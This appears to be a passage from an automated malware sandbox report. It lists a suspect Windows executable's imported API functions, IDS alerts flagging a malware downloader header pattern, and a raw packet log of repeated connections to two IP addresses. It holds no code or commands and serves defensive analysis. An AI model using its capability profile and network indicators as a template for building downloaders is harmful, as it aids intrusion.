                                                                          COMCTL32.dllImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, ImageList_ReplaceIcon, ImageList_Create, InitCommonControlsEx, ImageList_Destroy
                                                                          MPR.dllWNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W, WNetUseConnectionW
                                                                          WININET.dllInternetReadFile, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetConnectW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetQueryOptionW, InternetQueryDataAvailable
                                                                          PSAPI.DLLEnumProcesses, GetModuleBaseNameW, GetProcessMemoryInfo, EnumProcessModules
                                                                          USERENV.dllCreateEnvironmentBlock, DestroyEnvironmentBlock, UnloadUserProfile, LoadUserProfileW
                                                                          KERNEL32.dllHeapAlloc, Sleep, GetCurrentThreadId, RaiseException, MulDiv, GetVersionExW, GetSystemInfo, InterlockedIncrement, InterlockedDecrement, WideCharToMultiByte, lstrcpyW, MultiByteToWideChar, lstrlenW, lstrcmpiW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, DeleteFileW, FindNextFileW, MoveFileW, CopyFileW, CreateDirectoryW, RemoveDirectoryW, GetProcessHeap, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetLocalTime, CompareStringW, DeleteCriticalSection, EnterCriticalSection, LeaveCriticalSection, InitializeCriticalSectionAndSpinCount, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, GetTempPathW, GetTempFileNameW, VirtualFree, FormatMessageW, GetExitCodeProcess, SetErrorMode, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, DeviceIoControl, SetFileAttributesW, GetShortPathNameW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetCurrentThread, GetProcessIoCounters, CreateProcessW, SetPriorityClass, LoadLibraryW, VirtualAlloc, LoadLibraryExW, HeapFree, WaitForSingleObject, CreateThread, DuplicateHandle, GetLastError, CloseHandle, GetCurrentProcess, GetProcAddress, LoadLibraryA, FreeLibrary, GetModuleFileNameW, GetFullPathNameW, SetCurrentDirectoryW, IsDebuggerPresent, GetCurrentDirectoryW, ExitProcess, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetTimeFormatW, GetDateFormatW, GetCommandLineW, GetStartupInfoW, IsProcessorFeaturePresent, HeapSize, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStringTypeW, HeapCreate, SetHandleCount, GetFileType, SetStdHandle, GetConsoleCP, GetConsoleMode, LCMapStringW, RtlUnwind, SetFilePointer, GetTimeZoneInformation, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetTickCount, HeapReAlloc, WriteConsoleW, SetEndOfFile, SetSystemPowerState, SetEnvironmentVariableA
                                                                          USER32.dllGetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, ReleaseCapture, SetCapture, WindowFromPoint, LoadImageW, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, CheckMenuRadioItem, SetWindowPos, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, SystemParametersInfoW, TranslateMessage, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, GetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, MessageBoxW, DefWindowProcW, CopyImage, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, GetMenuItemID, DispatchMessageW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, PeekMessageW, UnregisterHotKey, CharLowerBuffW, keybd_event, MonitorFromRect, GetWindowThreadProcessId
                                                                          GDI32.dllDeleteObject, AngleArc, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, StrokePath, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, GetDeviceCaps, MoveToEx, DeleteDC, GetPixel, CreateDCW, Ellipse, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, GetStockObject, LineTo
                                                                          COMDLG32.dllGetSaveFileNameW, GetOpenFileNameW
                                                                          ADVAPI32.dllRegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegCreateKeyExW, GetUserNameW, RegConnectRegistryW, CloseServiceHandle, UnlockServiceDatabase, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, InitializeSecurityDescriptor, InitializeAcl, GetLengthSid, CopySid, LogonUserW, LockServiceDatabase, GetTokenInformation, GetSecurityDescriptorDacl, GetAclInformation, GetAce, AddAce, SetSecurityDescriptorDacl, RegOpenKeyExW, RegQueryValueExW, AdjustTokenPrivileges, InitiateSystemShutdownExW, OpenSCManagerW, RegCloseKey
                                                                          SHELL32.dllDragQueryPoint, ShellExecuteExW, SHGetFolderPathW, DragQueryFileW, SHEmptyRecycleBinW, SHBrowseForFolderW, SHFileOperationW, SHGetPathFromIDListW, SHGetDesktopFolder, SHGetMalloc, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
                                                                          ole32.dllOleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CLSIDFromString, StringFromGUID2, CoInitialize, CoUninitialize, CoCreateInstance, CreateStreamOnHGlobal, CoTaskMemAlloc, CoTaskMemFree, ProgIDFromCLSID, OleInitialize, CreateBindCtx, CLSIDFromProgID, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket, OleUninitialize, IIDFromString
                                                                          OLEAUT32.dllVariantChangeType, VariantCopyInd, DispCallFunc, CreateStdDispatch, CreateDispTypeInfo, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SysStringLen, SafeArrayAllocData, GetActiveObject, QueryPathOfRegTypeLib, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, SysAllocString, VariantCopy, VariantClear, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, OleLoadPicture, SafeArrayAccessData, VariantInit
                                                                          Language of compilation systemCountry where language is spokenMap
                                                                          EnglishGreat Britain
                                                                          EnglishUnited States
                                                                          TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                          2024-09-19T12:21:07.338014+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.549704132.226.247.7380TCP
                                                                          2024-09-19T12:21:09.322399+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.549704132.226.247.7380TCP
                                                                          2024-09-19T12:21:09.868381+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.549706188.114.97.3443TCP
                                                                          2024-09-19T12:21:10.634957+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.549707132.226.247.7380TCP
                                                                          2024-09-19T12:21:12.041239+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.549709132.226.247.7380TCP
                                                                          2024-09-19T12:21:12.587080+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.549710188.114.97.3443TCP
                                                                          2024-09-19T12:21:16.853340+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.549716188.114.97.3443TCP
                                                                          2024-09-19T12:21:19.338020+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.549719132.226.247.7380TCP
                                                                          2024-09-19T12:21:19.697445+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.549721188.114.97.3443TCP
                                                                          2024-09-19T12:21:20.478700+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.549719132.226.247.7380TCP
                                                                          2024-09-19T12:21:21.955719+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.549726188.114.97.3443TCP
                                                                          2024-09-19T12:21:23.019969+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.549728132.226.247.7380TCP
                                                                          2024-09-19T12:21:23.660634+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.549729188.114.97.3443TCP
                                                                          2024-09-19T12:21:26.310849+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.549735188.114.97.3443TCP
                                                                          2024-09-19T12:21:28.933359+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.549739188.114.97.3443TCP
                                                                          2024-09-19T12:21:30.247026+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.549741188.114.97.3443TCP
                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                          Sep 19, 2024 12:21:05.417531967 CEST4970480192.168.2.5132.226.247.73
                                                                          Sep 19, 2024 12:21:05.422441006 CEST8049704132.226.247.73192.168.2.5
                                                                          Sep 19, 2024 12:21:05.422522068 CEST4970480192.168.2.5132.226.247.73
                                                                          Sep 19, 2024 12:21:05.422763109 CEST4970480192.168.2.5132.226.247.73
                                                                          Sep 19, 2024 12:21:05.427541018 CEST8049704132.226.247.73192.168.2.5
                                                                          Sep 19, 2024 12:21:06.085481882 CEST8049704132.226.247.73192.168.2.5
                                                                          Sep 19, 2024 12:21:06.091797113 CEST4970480192.168.2.5132.226.247.73
                                                                          Sep 19, 2024 12:21:06.096760035 CEST8049704132.226.247.73192.168.2.5
                                                                          Sep 19, 2024 12:21:07.297427893 CEST8049704132.226.247.73192.168.2.5
                                                                          Sep 19, 2024 12:21:07.338013887 CEST4970480192.168.2.5132.226.247.73
                                                                          Sep 19, 2024 12:21:07.367664099 CEST49705443192.168.2.5188.114.97.3
                                                                          Sep 19, 2024 12:21:07.367719889 CEST44349705188.114.97.3192.168.2.5
                                                                          Sep 19, 2024 12:21:07.367803097 CEST49705443192.168.2.5188.114.97.3
                                                                          Sep 19, 2024 12:21:07.441756964 CEST49705443192.168.2.5188.114.97.3
                                                                          Sep 19, 2024 12:21:07.441834927 CEST44349705188.114.97.3192.168.2.5
                                                                          Sep 19, 2024 12:21:07.907056093 CEST44349705188.114.97.3192.168.2.5
                                                                          Sep 19, 2024 12:21:07.907179117 CEST49705443192.168.2.5188.114.97.3
                                                                          Sep 19, 2024 12:21:07.934458971 CEST49705443192.168.2.5188.114.97.3
                                                                          Sep 19, 2024 12:21:07.934497118 CEST44349705188.114.97.3192.168.2.5
                                                                          Sep 19, 2024 12:21:07.934808016 CEST44349705188.114.97.3192.168.2.5
                                                                          Sep 19, 2024 12:21:07.978631020 CEST49705443192.168.2.5188.114.97.3
                                                                          Sep 19, 2024 12:21:08.247917891 CEST49705443192.168.2.5188.114.97.3
                                                                          Sep 19, 2024 12:21:08.295447111 CEST44349705188.114.97.3192.168.2.5
                                                                          Sep 19, 2024 12:21:09.058197975 CEST44349705188.114.97.3192.168.2.5
                                                                          Sep 19, 2024 12:21:09.058309078 CEST44349705188.114.97.3192.168.2.5
                                                                          Sep 19, 2024 12:21:09.058595896 CEST49705443192.168.2.5188.114.97.3
                                                                          Sep 19, 2024 12:21:09.067245007 CEST49705443192.168.2.5188.114.97.3
                                                                          Sep 19, 2024 12:21:09.071471930 CEST4970480192.168.2.5132.226.247.73
                                                                          Sep 19, 2024 12:21:09.076555967 CEST8049704132.226.247.73192.168.2.5
                                                                          Sep 19, 2024 12:21:09.275693893 CEST8049704132.226.247.73192.168.2.5
                                                                          Sep 19, 2024 12:21:09.279181004 CEST49706443192.168.2.5188.114.97.3
                                                                          Sep 19, 2024 12:21:09.279243946 CEST44349706188.114.97.3192.168.2.5
                                                                          Sep 19, 2024 12:21:09.279354095 CEST49706443192.168.2.5188.114.97.3
                                                                          Sep 19, 2024 12:21:09.279659986 CEST49706443192.168.2.5188.114.97.3
                                                                          Sep 19, 2024 12:21:09.279673100 CEST44349706188.114.97.3192.168.2.5
                                                                          Sep 19, 2024 12:21:09.322398901 CEST4970480192.168.2.5132.226.247.73
                                                                          Sep 19, 2024 12:21:09.735295057 CEST44349706188.114.97.3192.168.2.5
                                                                          Sep 19, 2024 12:21:09.738645077 CEST49706443192.168.2.5188.114.97.3
                                                                          Sep 19, 2024 12:21:09.738723040 CEST44349706188.114.97.3192.168.2.5
                                                                          Sep 19, 2024 12:21:09.868251085 CEST44349706188.114.97.3192.168.2.5
                                                                          Sep 19, 2024 12:21:09.868377924 CEST44349706188.114.97.3192.168.2.5
                                                                          Sep 19, 2024 12:21:09.868449926 CEST49706443192.168.2.5188.114.97.3
                                                                          Sep 19, 2024 12:21:09.868937016 CEST49706443192.168.2.5188.114.97.3
                                                                          Sep 19, 2024 12:21:09.909662008 CEST4970480192.168.2.5132.226.247.73
                                                                          Sep 19, 2024 12:21:09.913840055 CEST4970780192.168.2.5132.226.247.73
                                                                          Sep 19, 2024 12:21:09.914818048 CEST8049704132.226.247.73192.168.2.5
                                                                          Sep 19, 2024 12:21:09.914895058 CEST4970480192.168.2.5132.226.247.73
                                                                          Sep 19, 2024 12:21:09.918684959 CEST8049707132.226.247.73192.168.2.5
                                                                          Sep 19, 2024 12:21:09.918783903 CEST4970780192.168.2.5132.226.247.73
                                                                          Sep 19, 2024 12:21:09.918914080 CEST4970780192.168.2.5132.226.247.73
                                                                          Sep 19, 2024 12:21:09.923661947 CEST8049707132.226.247.73192.168.2.5
                                                                          Sep 19, 2024 12:21:10.583904028 CEST8049707132.226.247.73192.168.2.5
                                                                          Sep 19, 2024 12:21:10.609652996 CEST49708443192.168.2.5188.114.97.3
                                                                          Sep 19, 2024 12:21:10.609697104 CEST44349708188.114.97.3192.168.2.5
                                                                          Sep 19, 2024 12:21:10.609925032 CEST49708443192.168.2.5188.114.97.3
                                                                          Sep 19, 2024 12:21:10.615299940 CEST49708443192.168.2.5188.114.97.3
                                                                          Sep 19, 2024 12:21:10.615313053 CEST44349708188.114.97.3192.168.2.5
                                                                          Sep 19, 2024 12:21:10.634957075 CEST4970780192.168.2.5132.226.247.73
                                                                          Sep 19, 2024 12:21:11.078728914 CEST44349708188.114.97.3192.168.2.5
                                                                          Sep 19, 2024 12:21:11.080749035 CEST49708443192.168.2.5188.114.97.3
                                                                          Sep 19, 2024 12:21:11.080838919 CEST44349708188.114.97.3192.168.2.5
                                                                          Sep 19, 2024 12:21:11.228162050 CEST44349708188.114.97.3192.168.2.5
                                                                          Sep 19, 2024 12:21:11.228360891 CEST44349708188.114.97.3192.168.2.5
                                                                          Sep 19, 2024 12:21:11.228524923 CEST49708443192.168.2.5188.114.97.3
                                                                          Sep 19, 2024 12:21:11.229017973 CEST49708443192.168.2.5188.114.97.3
                                                                          Sep 19, 2024 12:21:11.231992960 CEST4970780192.168.2.5132.226.247.73
                                                                          Sep 19, 2024 12:21:11.233463049 CEST4970980192.168.2.5132.226.247.73
                                                                          Sep 19, 2024 12:21:11.238126993 CEST8049707132.226.247.73192.168.2.5
                                                                          Sep 19, 2024 12:21:11.238198042 CEST4970780192.168.2.5132.226.247.73
                                                                          Sep 19, 2024 12:21:11.239521027 CEST8049709132.226.247.73192.168.2.5
                                                                          Sep 19, 2024 12:21:11.239609957 CEST4970980192.168.2.5132.226.247.73
                                                                          Sep 19, 2024 12:21:11.239732981 CEST4970980192.168.2.5132.226.247.73
                                                                          Sep 19, 2024 12:21:11.245600939 CEST8049709132.226.247.73192.168.2.5
                                                                          Sep 19, 2024 12:21:11.991666079 CEST8049709132.226.247.73192.168.2.5
                                                                          Sep 19, 2024 12:21:11.993041992 CEST49710443192.168.2.5188.114.97.3
                                                                          Sep 19, 2024 12:21:11.993094921 CEST44349710188.114.97.3192.168.2.5
                                                                          Sep 19, 2024 12:21:11.993166924 CEST49710443192.168.2.5188.114.97.3
                                                                          Sep 19, 2024 12:21:11.993438005 CEST49710443192.168.2.5188.114.97.3
                                                                          Sep 19, 2024 12:21:11.993463039 CEST44349710188.114.97.3192.168.2.5
                                                                          Sep 19, 2024 12:21:12.041239023 CEST4970980192.168.2.5132.226.247.73
                                                                          Sep 19, 2024 12:21:12.456252098 CEST44349710188.114.97.3192.168.2.5
                                                                          Sep 19, 2024 12:21:12.457756996 CEST49710443192.168.2.5188.114.97.3
                                                                          Sep 19, 2024 12:21:12.457801104 CEST44349710188.114.97.3192.168.2.5
                                                                          Sep 19, 2024 12:21:12.586915016 CEST44349710188.114.97.3192.168.2.5
                                                                          Sep 19, 2024 12:21:12.587014914 CEST44349710188.114.97.3192.168.2.5
                                                                          Sep 19, 2024 12:21:12.587172031 CEST49710443192.168.2.5188.114.97.3
                                                                          Sep 19, 2024 12:21:12.587738037 CEST49710443192.168.2.5188.114.97.3
                                                                          Sep 19, 2024 12:21:12.591496944 CEST4971180192.168.2.5132.226.247.73
                                                                          Sep 19, 2024 12:21:12.596618891 CEST8049711132.226.247.73192.168.2.5
                                                                          Sep 19, 2024 12:21:12.596697092 CEST4971180192.168.2.5132.226.247.73
                                                                          Sep 19, 2024 12:21:12.596837044 CEST4971180192.168.2.5132.226.247.73
                                                                          Sep 19, 2024 12:21:12.601716042 CEST8049711132.226.247.73192.168.2.5
                                                                          Sep 19, 2024 12:21:13.619724989 CEST8049711132.226.247.73192.168.2.5
                                                                          Sep 19, 2024 12:21:13.620918989 CEST8049711132.226.247.73192.168.2.5
                                                                          Sep 19, 2024 12:21:13.621001005 CEST4971180192.168.2.5132.226.247.73
                                                                          Sep 19, 2024 12:21:13.621140957 CEST49712443192.168.2.5188.114.97.3
                                                                          Sep 19, 2024 12:21:13.621176004 CEST44349712188.114.97.3192.168.2.5
                                                                          Sep 19, 2024 12:21:13.621241093 CEST49712443192.168.2.5188.114.97.3
                                                                          Sep 19, 2024 12:21:13.621480942 CEST49712443192.168.2.5188.114.97.3
                                                                          Sep 19, 2024 12:21:13.621493101 CEST44349712188.114.97.3192.168.2.5
                                                                          Sep 19, 2024 12:21:14.081718922 CEST44349712188.114.97.3192.168.2.5
                                                                          Sep 19, 2024 12:21:14.083615065 CEST49712443192.168.2.5188.114.97.3
                                                                          Sep 19, 2024 12:21:14.083682060 CEST44349712188.114.97.3192.168.2.5
                                                                          Sep 19, 2024 12:21:14.211141109 CEST44349712188.114.97.3192.168.2.5
                                                                          Sep 19, 2024 12:21:14.211354971 CEST44349712188.114.97.3192.168.2.5
                                                                          Sep 19, 2024 12:21:14.211520910 CEST49712443192.168.2.5188.114.97.3
                                                                          Sep 19, 2024 12:21:14.211731911 CEST49712443192.168.2.5188.114.97.3
                                                                          Sep 19, 2024 12:21:14.215353966 CEST4971180192.168.2.5132.226.247.73
                                                                          Sep 19, 2024 12:21:14.216511011 CEST4971380192.168.2.5132.226.247.73
                                                                          Sep 19, 2024 12:21:14.220802069 CEST8049711132.226.247.73192.168.2.5
                                                                          Sep 19, 2024 12:21:14.220902920 CEST4971180192.168.2.5132.226.247.73
                                                                          Sep 19, 2024 12:21:14.221430063 CEST8049713132.226.247.73192.168.2.5
                                                                          Sep 19, 2024 12:21:14.221497059 CEST4971380192.168.2.5132.226.247.73
                                                                          Sep 19, 2024 12:21:14.221731901 CEST4971380192.168.2.5132.226.247.73
                                                                          Sep 19, 2024 12:21:14.226578951 CEST8049713132.226.247.73192.168.2.5
                                                                          Sep 19, 2024 12:21:14.925029039 CEST8049713132.226.247.73192.168.2.5
                                                                          Sep 19, 2024 12:21:14.927316904 CEST49714443192.168.2.5188.114.97.3
                                                                          Sep 19, 2024 12:21:14.927409887 CEST44349714188.114.97.3192.168.2.5
                                                                          Sep 19, 2024 12:21:14.927803993 CEST49714443192.168.2.5188.114.97.3
                                                                          Sep 19, 2024 12:21:14.927970886 CEST49714443192.168.2.5188.114.97.3
                                                                          Sep 19, 2024 12:21:14.928003073 CEST44349714188.114.97.3192.168.2.5
                                                                          Sep 19, 2024 12:21:14.978626966 CEST4971380192.168.2.5132.226.247.73
                                                                          Sep 19, 2024 12:21:15.147749901 CEST8049713132.226.247.73192.168.2.5
                                                                          Sep 19, 2024 12:21:15.147978067 CEST4971380192.168.2.5132.226.247.73
                                                                          Sep 19, 2024 12:21:15.394938946 CEST44349714188.114.97.3192.168.2.5
                                                                          Sep 19, 2024 12:21:15.396816015 CEST49714443192.168.2.5188.114.97.3
                                                                          Sep 19, 2024 12:21:15.396897078 CEST44349714188.114.97.3192.168.2.5
                                                                          Sep 19, 2024 12:21:15.544178963 CEST44349714188.114.97.3192.168.2.5
                                                                          Sep 19, 2024 12:21:15.544394970 CEST44349714188.114.97.3192.168.2.5
                                                                          Sep 19, 2024 12:21:15.544466019 CEST49714443192.168.2.5188.114.97.3
                                                                          Sep 19, 2024 12:21:15.545123100 CEST49714443192.168.2.5188.114.97.3
                                                                          Sep 19, 2024 12:21:15.548933983 CEST4971380192.168.2.5132.226.247.73
                                                                          Sep 19, 2024 12:21:15.550045967 CEST4971580192.168.2.5132.226.247.73
                                                                          Sep 19, 2024 12:21:15.554178953 CEST8049713132.226.247.73192.168.2.5
                                                                          Sep 19, 2024 12:21:15.554265976 CEST4971380192.168.2.5132.226.247.73
                                                                          Sep 19, 2024 12:21:15.554963112 CEST8049715132.226.247.73192.168.2.5
                                                                          Sep 19, 2024 12:21:15.555032969 CEST4971580192.168.2.5132.226.247.73
                                                                          Sep 19, 2024 12:21:15.555119038 CEST4971580192.168.2.5132.226.247.73
                                                                          Sep 19, 2024 12:21:15.559966087 CEST8049715132.226.247.73192.168.2.5
                                                                          Sep 19, 2024 12:21:16.216988087 CEST8049715132.226.247.73192.168.2.5
                                                                          Sep 19, 2024 12:21:16.240864992 CEST49716443192.168.2.5188.114.97.3
                                                                          Sep 19, 2024 12:21:16.240935087 CEST44349716188.114.97.3192.168.2.5
                                                                          Sep 19, 2024 12:21:16.241044998 CEST49716443192.168.2.5188.114.97.3
                                                                          Sep 19, 2024 12:21:16.249074936 CEST49716443192.168.2.5188.114.97.3
                                                                          Sep 19, 2024 12:21:16.249100924 CEST44349716188.114.97.3192.168.2.5
                                                                          Sep 19, 2024 12:21:16.272459984 CEST4971580192.168.2.5132.226.247.73
                                                                          Sep 19, 2024 12:21:16.712842941 CEST44349716188.114.97.3192.168.2.5
                                                                          Sep 19, 2024 12:21:16.716872931 CEST49716443192.168.2.5188.114.97.3
                                                                          Sep 19, 2024 12:21:16.716905117 CEST44349716188.114.97.3192.168.2.5
                                                                          Sep 19, 2024 12:21:16.853387117 CEST44349716188.114.97.3192.168.2.5
                                                                          Sep 19, 2024 12:21:16.853600979 CEST44349716188.114.97.3192.168.2.5
                                                                          Sep 19, 2024 12:21:16.853660107 CEST49716443192.168.2.5188.114.97.3
                                                                          Sep 19, 2024 12:21:16.854192019 CEST49716443192.168.2.5188.114.97.3
                                                                          Sep 19, 2024 12:21:16.860960960 CEST4971580192.168.2.5132.226.247.73
                                                                          Sep 19, 2024 12:21:16.861807108 CEST4971780192.168.2.5132.226.247.73
                                                                          Sep 19, 2024 12:21:16.866307974 CEST8049715132.226.247.73192.168.2.5
                                                                          Sep 19, 2024 12:21:16.866383076 CEST4971580192.168.2.5132.226.247.73
                                                                          Sep 19, 2024 12:21:16.866703987 CEST8049717132.226.247.73192.168.2.5
                                                                          Sep 19, 2024 12:21:16.866792917 CEST4971780192.168.2.5132.226.247.73
                                                                          Sep 19, 2024 12:21:16.866899014 CEST4971780192.168.2.5132.226.247.73
                                                                          Sep 19, 2024 12:21:16.871673107 CEST8049717132.226.247.73192.168.2.5
                                                                          Sep 19, 2024 12:21:17.531632900 CEST8049717132.226.247.73192.168.2.5
                                                                          Sep 19, 2024 12:21:17.533658028 CEST49718443192.168.2.5188.114.97.3
                                                                          Sep 19, 2024 12:21:17.533741951 CEST44349718188.114.97.3192.168.2.5
                                                                          Sep 19, 2024 12:21:17.533857107 CEST49718443192.168.2.5188.114.97.3
                                                                          Sep 19, 2024 12:21:17.534282923 CEST49718443192.168.2.5188.114.97.3
                                                                          Sep 19, 2024 12:21:17.534317017 CEST44349718188.114.97.3192.168.2.5
                                                                          Sep 19, 2024 12:21:17.572408915 CEST4971780192.168.2.5132.226.247.73
                                                                          Sep 19, 2024 12:21:17.991929054 CEST44349718188.114.97.3192.168.2.5
                                                                          Sep 19, 2024 12:21:17.993438959 CEST49718443192.168.2.5188.114.97.3
                                                                          Sep 19, 2024 12:21:17.993480921 CEST44349718188.114.97.3192.168.2.5
                                                                          Sep 19, 2024 12:21:18.127141953 CEST4971980192.168.2.5132.226.247.73
                                                                          Sep 19, 2024 12:21:18.328597069 CEST44349718188.114.97.3192.168.2.5
                                                                          Sep 19, 2024 12:21:18.328685999 CEST8049719132.226.247.73192.168.2.5
                                                                          Sep 19, 2024 12:21:18.328758001 CEST44349718188.114.97.3192.168.2.5
                                                                          Sep 19, 2024 12:21:18.328865051 CEST4971980192.168.2.5132.226.247.73
                                                                          Sep 19, 2024 12:21:18.328867912 CEST49718443192.168.2.5188.114.97.3
                                                                          Sep 19, 2024 12:21:18.329586029 CEST4971980192.168.2.5132.226.247.73
                                                                          Sep 19, 2024 12:21:18.329694986 CEST49718443192.168.2.5188.114.97.3
                                                                          Sep 19, 2024 12:21:18.333147049 CEST4971780192.168.2.5132.226.247.73
                                                                          Sep 19, 2024 12:21:18.334108114 CEST4972080192.168.2.5132.226.247.73
                                                                          Sep 19, 2024 12:21:18.334369898 CEST8049719132.226.247.73192.168.2.5
                                                                          Sep 19, 2024 12:21:18.338416100 CEST8049717132.226.247.73192.168.2.5
                                                                          Sep 19, 2024 12:21:18.338474989 CEST4971780192.168.2.5132.226.247.73
                                                                          Sep 19, 2024 12:21:18.339059114 CEST8049720132.226.247.73192.168.2.5
                                                                          Sep 19, 2024 12:21:18.339263916 CEST4972080192.168.2.5132.226.247.73
                                                                          Sep 19, 2024 12:21:18.339478016 CEST4972080192.168.2.5132.226.247.73
                                                                          Sep 19, 2024 12:21:18.344310045 CEST8049720132.226.247.73192.168.2.5
                                                                          Sep 19, 2024 12:21:19.012907028 CEST8049720132.226.247.73192.168.2.5
                                                                          Sep 19, 2024 12:21:19.014273882 CEST49721443192.168.2.5188.114.97.3
                                                                          Sep 19, 2024 12:21:19.014313936 CEST44349721188.114.97.3192.168.2.5
                                                                          Sep 19, 2024 12:21:19.014539003 CEST49721443192.168.2.5188.114.97.3
                                                                          Sep 19, 2024 12:21:19.014879942 CEST49721443192.168.2.5188.114.97.3
                                                                          Sep 19, 2024 12:21:19.014890909 CEST44349721188.114.97.3192.168.2.5
                                                                          Sep 19, 2024 12:21:19.021155119 CEST8049719132.226.247.73192.168.2.5
                                                                          Sep 19, 2024 12:21:19.057081938 CEST4972080192.168.2.5132.226.247.73
                                                                          Sep 19, 2024 12:21:19.072381973 CEST4971980192.168.2.5132.226.247.73
